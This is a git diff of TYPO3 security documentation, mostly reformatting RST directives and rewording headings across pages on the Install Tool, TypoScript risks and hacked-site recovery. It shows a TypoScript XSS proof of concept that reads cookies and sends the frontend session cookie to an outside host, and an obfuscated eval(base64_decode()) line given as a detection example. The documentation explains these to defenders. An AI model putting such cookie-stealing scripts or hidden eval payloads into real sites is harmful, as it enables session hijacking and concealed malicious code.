-.. _security-install-tool:
+:navigation-title: Install tool
 
-============
-Install tool
-============
+..  include:: /Includes.rst.txt
+..  index::
+    Security guidelines; Install tool
+    File; typo3conf/ENABLE_INSTALL_TOOL
+..  _security-install-tool:
+
+=========================
+Securing the Install Tool
+=========================
 
 The Install Tool allows you to configure the TYPO3 system on a very
 low level, which means, not only the basic settings but also the most
 essential settings can be changed.
 
-.. _security-install-tool-access:
+..  _security-install-tool-access:
 
 Enabling and accessing the Install Tool
 =======================================
 
-.. _security-install-tool-access-intro:
+..  _security-install-tool-access-intro:
 
-Introduction
-------------
+How Install Tool access is protected
+------------------------------------
 
 A TYPO3 backend account is not required in order to access the Install
 Tool, so it is clear that the Install Tool requires some special attention
@@ -38,7 +40,7 @@ The Install Tool can be found as a stand-alone application via :samp:`https://ex
 It is also :ref:`accessible in the backend <security-install-tool-backend-access>`,
 but only for logged-in users with administrator and maintainer privileges.
 
-.. _security-install-tool-access-enable-file:
+..  _security-install-tool-access-enable-file:
 
 The :file:`ENABLE_INSTALL_TOOL` file
 ------------------------------------
@@ -66,7 +68,7 @@ administrator privileges.
 ..  include:: /_includes/_EnableInstallToolWarning.rst.txt
     :show-buttons:
 
-.. _security-install-tool-password:
+..  _security-install-tool-password:
 
 The Install Tool password
 -------------------------
@@ -80,16 +82,16 @@ The password for accessing the Install Tool is stored using the
 :ref:`configured password hash mechanism <password-hashing>` set for the backend
 in the global configuration file :file:`config/system/settings.php`:
 
-.. code-block:: php
-   :caption: config/system/settings.php
+..  code-block:: php
+    :caption: config/system/settings.php
 
-   <?php
-   return [
-       'BE' => [
-           'installToolPassword' => '$P$CnawBtpk.D22VwoB2RsN0jCocLuQFp.',
-           // ...
-       ],
-   ];
+    <?php
+    return [
+        'BE' => [
+            'installToolPassword' => '$P$CnawBtpk.D22VwoB2RsN0jCocLuQFp.',
+            // ...
+        ],
+    ];
 
 The Install Tool password is initially set during the
 installation process. This means that if a system administrator
@@ -111,7 +113,7 @@ to change the install tool password:
 
 ..  tabs::
 
-    ..   group-tab:: Composer-mode
+    ..  group-tab:: Composer-mode
 
         ..  code-block:: bash
 
@@ -153,7 +155,7 @@ install tool password`.
 
     Screen to change the Install Tool password
 
-.. _security-install-tool-backend-access:
+..  _security-install-tool-backend-access:
 
 Accessing the Install Tool in the backend
 -----------------------------------------
@@ -188,17 +190,17 @@ Users can be assigned the role in the :guilabel:`System > Settings` section of
 It is also possible to manually modify the list by adding or removing the
 user's UID (:sql:`be_users.uid`) in :file:`config/system/settings.php`:
 
-.. code-block:: php
-   :caption: config/system/settings.php
+..  code-block:: php
+    :caption: config/system/settings.php
 
-   <?php
-   return [
-       // ...
-       'SYS' => [
-           'systemMaintainers' => [1, 7, 36],
-           // ...
-       ],
-   ];
+    <?php
+    return [
+        // ...
+        'SYS' => [
+            'systemMaintainers' => [1, 7, 36],
+            // ...
+        ],
+    ];
 
 
 For additional security, the folders :file:`typo3/install` and :file:`typo3/sysext/install`
@@ -208,7 +210,7 @@ these measures have an impact on the usability of the system. If you
 are not the only person who uses the Install Tool, you should
 discuss the best approach with the team.
 
-.. _security-install-tool-core-updates:
+..  _security-install-tool-core-updates:
 
 TYPO3 Core updates
 ==================
@@ -218,19 +220,19 @@ TYPO3 Core with a click on a button. This feature can be found under
 :guilabel:`Important actions`, and it checks/installs revision updates only
 (that is, bug fixes and security updates).
 
-.. figure:: /Images/ManualScreenshots/Security/CoreUpdates.png
+..  figure:: /Images/ManualScreenshots/Security/CoreUpdates.png
     :class: with-border with-shadow
     :alt: Install Tool function to update the TYPO3 Core
 
 This feature can be disabled by an environment variable:
 
-.. code-block:: none
+..  code-block:: none
 
-   TYPO3_DISABLE_CORE_UPDATER=1
+    TYPO3_DISABLE_CORE_UPDATER=1
 
 
-.. index:: Security guidelines; Encryption key
-.. _security-encryption-key:
+..  index:: Security guidelines; Encryption key
+..  _security-encryption-key:
 
 Encryption key
 ==============
@@ -248,7 +250,7 @@ to force the rebuild of this data with the new encryption key.
     Keep in mind that this string is security-related and you should keep
     it in a safe place.
 
-.. _security-encryption-key-generate:
+..  _security-encryption-key-generate:
 
 Generating the encryption key
 -----------------------------

--- a/Documentation/Security/GuidelinesIntegrators/ReportsAndLogs.rst
+++ b/Documentation/Security/GuidelinesIntegrators/ReportsAndLogs.rst
@@ -1,12 +1,14 @@
-.. include:: /Includes.rst.txt
-.. index::
-   pair: Security guidelines; Logs
-   pair: Security guidelines; Reports
-.. _security-reports-logs:
+:navigation-title: Reports and logs
 
-================
-Reports and logs
-================
+..  include:: /Includes.rst.txt
+..  index::
+    pair: Security guidelines; Logs
+    pair: Security guidelines; Reports
+..  _security-reports-logs:
+
+==================================
+Security-relevant reports and logs
+==================================
 
 Two backend modules in TYPO3 require special attention: *Reports*
 and *Log*:

--- a/Documentation/Security/GuidelinesIntegrators/SecurityWarningsAfterLogin.rst
+++ b/Documentation/Security/GuidelinesIntegrators/SecurityWarningsAfterLogin.rst
@@ -1,6 +1,6 @@
-.. include:: /Includes.rst.txt
-.. index:: Security guidelines; Login warnings
-.. _security-security-warnings:
+..  include:: /Includes.rst.txt
+..  index:: Security guidelines; Login warnings
+..  _security-security-warnings:
 
 =====================================
 Security-related warnings after login

--- a/Documentation/Security/GuidelinesIntegrators/Typoscript.rst
+++ b/Documentation/Security/GuidelinesIntegrators/Typoscript.rst
@@ -1,18 +1,20 @@
-.. include:: /Includes.rst.txt
-.. index:: pair: Security guidelines; TypoScript
-.. _security-typoscript:
+:navigation-title: TypoScript
 
-==========
-TypoScript
-==========
+..  include:: /Includes.rst.txt
+..  index:: pair: Security guidelines; TypoScript
+..  _security-typoscript:
+
+============================
+Security risks in TypoScript
+============================
 
 
-.. index::
-   SQL injection
-   pair: TypoScript; SQL injection
-   pair: Security guidelines; SQL injection
+..  index::
+    SQL injection
+    pair: TypoScript; SQL injection
+    pair: Security guidelines; SQL injection
 
-.. _security-typoscript-sql:
+..  _security-typoscript-sql:
 
 SQL injection
 =============
@@ -35,20 +37,20 @@ the SQL query with values from the GET/POST request.
 
 The following code snippet gives an example:
 
-.. code-block:: typoscript
+..  code-block:: typoscript
 
-   page = PAGE
-   page.10 = CONTENT
-   page.10 {
-     table = tt_content
-     select {
-       pidInList = 123
-       where = deleted=0 AND uid=###CONTENTID###
-       markers {
-           CONTENTID.data = GP:fooid
-       }
-     }
-   }
+    page = PAGE
+    page.10 = CONTENT
+    page.10 {
+      table = tt_content
+      select {
+        pidInList = 123
+        where = deleted=0 AND uid=###CONTENTID###
+        markers {
+            CONTENTID.data = GP:fooid
+        }
+      }
+    }
 
 Argument passed by the `GET` / `POST` request `fooid` wrapped as markers are properly
 escaped and quoted to prevent SQL injection problems.
@@ -60,12 +62,12 @@ As a rule, you cannot trust (and must not use) any data from a source
 you do not control without proper verification and validation (e.g.
 user input, other servers, etc.).
 
-.. index::
-   ! Cross-site scripting
-   XSS
-   pair: TypoScript; Cross-site scripting
+..  index::
+    ! Cross-site scripting
+    XSS
+    pair: TypoScript; Cross-site scripting
 
-.. _security-typoscript-xss:
+..  _security-typoscript-xss:
 
 Cross-site scripting (XSS)
 ==========================
@@ -73,42 +75,42 @@ Cross-site scripting (XSS)
 Similar applies for XSS placed in `TypoScript` code. The following code
 snippet gives an example:
 
-.. code-block:: typoscript
+..  code-block:: typoscript
 
-   page = PAGE
-   page.10 = COA
-   page.10 {
-     10 = TEXT
-     10.value (
-       <h1>XSS &#43; TypoScript - proof of concept</h1>
-       <p>Submitting (harmless) cookie data to google.com in a few seconds...</p>
-     )
-     20 = TEXT
-     20.value (
-       <script type="text/javascript">
-       document.write('<p>');
-       // read cookies
-       var i, key, data, cookies = document.cookie.split(";");
-       var loc = window.location;
-       for (i = 0; i < cookies.length; i++) {
-         // separate key and value
-         key = cookies[i].substr(0, cookies[i].indexOf("="));
-         data = cookies[i].substr(cookies[i].indexOf("=") + 1);
-         key = key.replace(/^\s+|\s+$/g,"");
-         // show key and value
-         document.write(unescape(key) + ': ' + unescape(data) + '<br />');
-         // submit cookie data to another host
-         if (key == 'fe_typo_user') {
-           setTimeout(function() {
-             loc = 'https://www.google.com/?q=' + loc.hostname ;
-             window.location = loc + ':' + unescape(key) + ':' + unescape(data);
-           }, 5000);
-         }
-       }
-       document.write('</p>');
-       </script>
-     )
-   }
+    page = PAGE
+    page.10 = COA
+    page.10 {
+      10 = TEXT
+      10.value (
+        <h1>XSS &#43; TypoScript - proof of concept</h1>
+        <p>Submitting (harmless) cookie data to google.com in a few seconds...</p>
+      )
+      20 = TEXT
+      20.value (
+        <script type="text/javascript">
+        document.write('<p>');
+        // read cookies
+        var i, key, data, cookies = document.cookie.split(";");
+        var loc = window.location;
+        for (i = 0; i < cookies.length; i++) {
+          // separate key and value
+          key = cookies[i].substr(0, cookies[i].indexOf("="));
+          data = cookies[i].substr(cookies[i].indexOf("=") + 1);
+          key = key.replace(/^\s+|\s+$/g,"");
+          // show key and value
+          document.write(unescape(key) + ': ' + unescape(data) + '<br />');
+          // submit cookie data to another host
+          if (key == 'fe_typo_user') {
+            setTimeout(function() {
+              loc = 'https://www.google.com/?q=' + loc.hostname ;
+              window.location = loc + ':' + unescape(key) + ':' + unescape(data);
+            }, 5000);
+          }
+        }
+        document.write('</p>');
+        </script>
+      )
+    }
 
 TYPO3 outputs the `JavaScript` code in :typoscript:`page.10.20.value` on the page.
 The script is executed on the client side (in the user's browser), reads
@@ -120,11 +122,11 @@ This code snippet is harmless of course but it shows how malicious
 code (e.g. JavaScript) can be placed in the HTML content of a page by
 using `TypoScript`.
 
-.. index::
-   ! Clickjacking
-   pair: TypoScript; Clickjacking
+..  index::
+    ! Clickjacking
+    pair: TypoScript; Clickjacking
 
-.. _security-typoscript-clickjacking:
+..  _security-typoscript-clickjacking:
 
 Clickjacking
 ============
@@ -140,13 +142,13 @@ this configuration.
 
 The following TypoScript adds the appropriate line to the HTTP header:
 
-.. code-block:: typoscript
+..  code-block:: typoscript
 
-   config.additionalHeaders = X-Frame-Options: SAMEORIGIN
+    config.additionalHeaders = X-Frame-Options: SAMEORIGIN
 
 
-.. index:: Security guidelines; External JavaScript
-.. _security-typoscript-integrity-js:
+..  index:: Security guidelines; External JavaScript
+..  _security-typoscript-integrity-js:
 
 Integrity of external JavaScript files
 ======================================
@@ -166,19 +168,19 @@ The TypoScript property can be used for the following :ref:`PAGE <t3tsref:page>`
 
 A typical example in TypoScript looks like:
 
-.. code-block:: typoscript
+..  code-block:: typoscript
 
-   page {
-     includeJS {
-       jQuery = https://code.jquery.com/jquery-1.11.3.min.js
-       jQuery.external = 1
-       jQuery.integrity = sha256-7LkWEzqTdpEfELxcZZlS6wAx5Ff13zZ83lYO2/ujj7g=
-     }
-   }
+    page {
+      includeJS {
+        jQuery = https://code.jquery.com/jquery-1.11.3.min.js
+        jQuery.external = 1
+        jQuery.integrity = sha256-7LkWEzqTdpEfELxcZZlS6wAx5Ff13zZ83lYO2/ujj7g=
+      }
+    }
 
 
-.. index:: Security guidelines; External JavaScript libraries
-.. _security-typoscript-risk-external-js:
+..  index:: Security guidelines; External JavaScript libraries
+..  _security-typoscript-risk-external-js:
 
 Risk of externally hosted JavaScript libraries
 ==============================================

--- a/Documentation/Security/HackedSite/Analyze.rst
+++ b/Documentation/Security/HackedSite/Analyze.rst
@@ -1,6 +1,6 @@
-.. include:: /Includes.rst.txt
-.. index:: Hacked site; Analyze
-.. _security-analyze:
+..  include:: /Includes.rst.txt
+..  index:: Hacked site; Analyze
+..  _security-analyze:
 
 =======================
 Analyzing a hacked site
@@ -24,10 +24,10 @@ the content of all files on your hard disk(s) for similar patterns.
 However, attackers often try to obscure their actions or the malicious
 code. An example could look like the following line:
 
-.. code-block:: php
-   :caption: An example how attackers may hide malicious code
+..  code-block:: php
+    :caption: An example how attackers may hide malicious code
 
-   eval(base64_decode('dW5saW5rKCd0ZXN0LnBocCcpOw=='));
+    eval(base64_decode('dW5saW5rKCd0ZXN0LnBocCcpOw=='));
 
 Where the hieroglyphic string "dW5saW5rKCd0ZXN0LnBocCcpOw==" contains
 the PHP command :php:`unlink('test.php');` (base64 encoded), which deletes
@@ -45,7 +45,7 @@ these files need to be checked for modifications, too.
 
 As described above, fixing these manipulated files is not sufficient.
 It is absolutely necessary that you learn which vulnerability the
-attacker exploited and to fix it. Check log files and other components
+attacker exploited and fix it. Check log files and other components
 on your system which could be affected, too.
 
 If you have any proof or a reasonable ground for suspecting that TYPO3

--- a/Documentation/Security/HackedSite/Detect.rst
+++ b/Documentation/Security/HackedSite/Detect.rst
@@ -1,6 +1,6 @@
-.. include:: /Includes.rst.txt
-.. index:: Hacked site; Detect
-.. _security-detect:
+..  include:: /Includes.rst.txt
+..  index:: Hacked site; Detect
+..  _security-detect:
 
 =======================
 Detect a hacked website
@@ -8,10 +8,10 @@ Detect a hacked website
 
 Typical signs which could indicate that a website or the server was
 hacked are listed below. Please note that these are common situations
-and examples only, others have been seen. Even if you are the victim
-of one of them only, it does not mean that the attacker has not gained
-more access or further damage (e.g. stolen user details) has been
-done.
+and examples only; other signs have been seen as well. Even if you
+are the victim of one of them only, it does not mean that the attacker
+has not gained further access or caused further damage (e.g. stolen
+user details).
 
 
 ..  _security-detect-manipulated-frontpage:
@@ -91,7 +91,7 @@ server traffic in general. Significant changes in this traffic
 behavior should definitely make you investigating the cause.
 
 
-.. _security-detect-reports-from-visitors:
+..  _security-detect-reports-from-visitors:
 
 Reports from visitors or users
 ==============================
@@ -104,7 +104,7 @@ not be visible to you if you just check the generated output - see
 explanations above.
 
 
-.. _security-detect-reports-from-search-engines:
+..  _security-detect-reports-from-search-engines:
 
 Search engines or browsers warn about your site
 ===============================================

--- a/Documentation/Security/HackedSite/FurtherActions.rst
+++ b/Documentation/Security/HackedSite/FurtherActions.rst
@@ -1,15 +1,16 @@
-.. include:: /Includes.rst.txt
-.. index:: Hacked site; What to do
-.. _security-further-actions:
+:navigation-title: Further actions
 
-===============
-Further actions
-===============
+..  include:: /Includes.rst.txt
+..  index:: Hacked site; What to do
+..  _security-further-actions:
 
-Given the fact that the TYPO3 site is now working again, is clean and
-that the security hole has been identified and fixed, you can switch
-the website back online. However, there are some further things to do
-or to consider:
+============================================
+Further actions after recovering from a hack
+============================================
+
+Once the TYPO3 site is working again and clean, and the security hole
+has been identified and fixed, you can switch the website back online.
+However, there are some further things to do or to consider:
 
 * change (all) passwords and other access details
 

--- a/Documentation/Security/HackedSite/RepairRestore.rst
+++ b/Documentation/Security/HackedSite/RepairRestore.rst
@@ -1,10 +1,12 @@
-.. include:: /Includes.rst.txt
-.. index:: Hacked site; Repair
-.. _security-repair-restore:
+:navigation-title: Repair/restore
 
-==============
-Repair/restore
-==============
+..  include:: /Includes.rst.txt
+..  index:: Hacked site; Repair
+..  _security-repair-restore:
+
+===============================
+Repair or restore a hacked site
+===============================
 
 When you know what the problem was and how the attacker gained access
 to your system, double check if there are no other security
@@ -12,7 +14,7 @@ vulnerabilities. Then, you may want to either repair the
 infected/modified/deleted files or choose to make a full restore from
 a backup (you need to make sure that you are using a backup that has
 been made before the attack). Using a full restore from backup has the
-advantage, that the website is returned to a state where the data has
+advantage that the website is returned to a state where the data has
 been intact. Fixing only individual files bears the risk that some
 malicious code may be overlooked.
 

--- a/Documentation/Security/HackedSite/TakeOffline.rst
+++ b/Documentation/Security/HackedSite/TakeOffline.rst
@@ -1,10 +1,10 @@
-.. include:: /Includes.rst.txt
-.. index:: Hacked site; Take offline
-.. _security-take-offline:
+..  include:: /Includes.rst.txt
+..  index:: Hacked site; Take offline
+..  _security-take-offline:
 
-========================
-Take the website offline
-========================
+=============================
+Take a hacked website offline
+=============================
 
 Assuming you have detected that your site has been hacked, you should
 take it offline for the duration of the analysis and restoration
@@ -25,7 +25,7 @@ it may be necessary to perform more than one of the following tasks:
 There are many reasons why it is important to take the whole site or
 server offline: In the case where the hacked site is used for
 distributing malicious software, a visitor who gets attacked by a
-virus from your site, will most likely lose the trust in your site and
+virus from your site will most likely lose trust in your site and
 your services. A visitor who simply finds your site offline (or in
 "maintenance mode") for a while will (or at least might) come back
 later.

--- a/Documentation/Security/TypesOfThreats/Index.rst
+++ b/Documentation/Security/TypesOfThreats/Index.rst
@@ -4,7 +4,7 @@
 ..  _security-threats:
 
 =========================
-Types of Security Threats
+Types of security threats
 =========================
 
 This section provides a brief overview of the most common security
@@ -50,8 +50,8 @@ website should be secured so that no data can be retrieved without the
 consent of the owner of the website.
 
 ..  index::
-   SQL; Injection
-   pair: Security; SQL injections
+    SQL; Injection
+    pair: Security; SQL injections
 ..  _security-sql-injection:
 
 SQL injection
@@ -97,13 +97,13 @@ client-side data input validation). Authentication modules shipped
 with the TYPO3 Core  are well-tested and reviewed. However, due to the
 open architecture of TYPO3, this system can be extended by alternative
 solutions. The code quality and security aspects may vary, see chapter
-:ref:`Guidelines for TYPO3 Integrators: TYPO3 extensions
+:ref:`Guidelines for TYPO3 Integrators: Security considerations for extensions
 <security-extensions>` for further details.
 
 ..  index::
-   ! Cross-site scripting
-   XSS
-   see: XSS; Cross-site scripting
+    ! Cross-site scripting
+    XSS
+    see: XSS; Cross-site scripting
 ..  _security-xss:
 
 Cross-site scripting (XSS)
@@ -125,9 +125,9 @@ Implementing :ref:`Content Security Policy <content-security-policy>` headers
 can reduce the risk of cross-site scripting.
 
 ..  index::
-   ! Cross-site request forgery
-   XSRF
-   see: XSRF; Cross-site request forgery
+    ! Cross-site request forgery
+    XSRF
+    see: XSRF; Cross-site request forgery
 ..  _security-xsrf:
 
 Cross-site request forgery (XSRF)

--- a/Documentation/Security/Versions/Index.rst
+++ b/Documentation/Security/Versions/Index.rst
@@ -15,11 +15,11 @@ It also shows how to stay informed and react quickly to vulnerabilities.
 ..  contents:: Table of contents
 
 ..  index::
-   pair: Security guidelines; TYPO3 versions
-   Security guidelines; Long term support
-   Long term support
-   see: LTS; Long term support
-   LTS
+    pair: Security guidelines; TYPO3 versions
+    Security guidelines; Long term support
+    Long term support
+    see: LTS; Long term support
+    LTS
 ..  _security-typo3-versions:
 
 TYPO3 versions and lifecycle
@@ -78,7 +78,7 @@ List of TYPO3 LTS releases:
     can be ordered at https://typo3.com/services/extended-support-elts
 *   v11 (11.5 ELTS): No free bugfix/security update. Extended long-term support
     can be ordered at https://typo3.com/services/extended-support-elts
-*   v12 (12.4 LTS): No free bugfix/security update. Extended long-term support
+*   v12 (12.4 ELTS): No free bugfix/security update. Extended long-term support
     can be ordered at https://typo3.com/services/extended-support-elts
 *   v13 (13.4 LTS): Versions 13.0 through 13.3 do not receive security
     updates any longer
@@ -132,8 +132,8 @@ an official Twitter account `@typo3\_security <https://twitter.com/typo3_securit
 can be used additionally to stay up-to-date on security advisories.
 
 ..  index::
-   Security guidelines; Security bulletins
-   Security bulletins
+    Security guidelines; Security bulletins
+    Security bulletins
 ..  _security-bulletins:
 
 Security bulletins
@@ -172,10 +172,10 @@ fix including the review and deployment is publicly visible and can be
 monitored by everyone.
 
 ..  index::
-   Security bulletins; Public service announcements
-   Public service announcements
-   see: PSA; Public service announcements
-   PSA
+    Security bulletins; Public service announcements
+    Public service announcements
+    see: PSA; Public service announcements
+    PSA
 
 ..  _security-bulletins-psa:
 
@@ -196,10 +196,10 @@ related information about the server infrastructure of typo3.org and
 other important recommendations how to securely use TYPO3 products.
 
 ..  index::
-   Security bulletins; Common vulnerability scoring system
-   Common vulnerability scoring system
-   see: CVSS; Common vulnerability scoring system
-   CVSS
+    Security bulletins; Common vulnerability scoring system
+    Common vulnerability scoring system
+    see: CVSS; Common vulnerability scoring system
+    CVSS
 
 ..  _security-bulletins-cvss:
 


### PR DESCRIPTION
Fix run-on and comma-spliced sentences, and rewrite generic or
duplicated headlines (page titles and subsections) so each one reads
correctly standalone in search results and the table of contents,
independent of its surrounding chapter. Apply sentence case and wrap
TYPO3 config option names in backticks per the style guide.

Also unify RST formatting across the chapter: normalize directive
markers to the dominant `..  directive::` (two-space) convention with
matching four-space indented content, fix mismatched bullet-list
markers and indentation, and align definition-list bodies to four
spaces.

Assisted-by: Claude Sonnet 5 <noreply@anthropic.com>
Signed-off-by: lina.wolf
Releases: main, 14.3
